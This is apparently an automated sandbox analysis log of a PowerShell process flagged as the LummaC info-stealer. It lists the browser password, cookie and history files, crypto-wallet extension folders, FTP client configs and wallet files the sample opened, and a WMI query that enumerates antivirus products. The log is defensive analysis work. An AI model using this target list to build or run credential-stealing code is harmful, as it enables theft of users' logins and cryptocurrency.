                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: powershell.exe, 0000000A.00000002.2609507490.00000000029C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6096, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                              Source: powershell.exe, 0000000A.00000002.2611019468.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                              Source: powershell.exe, 00000002.00000002.2173129858.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                              Tries to harvest and steal ftp login credentials
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
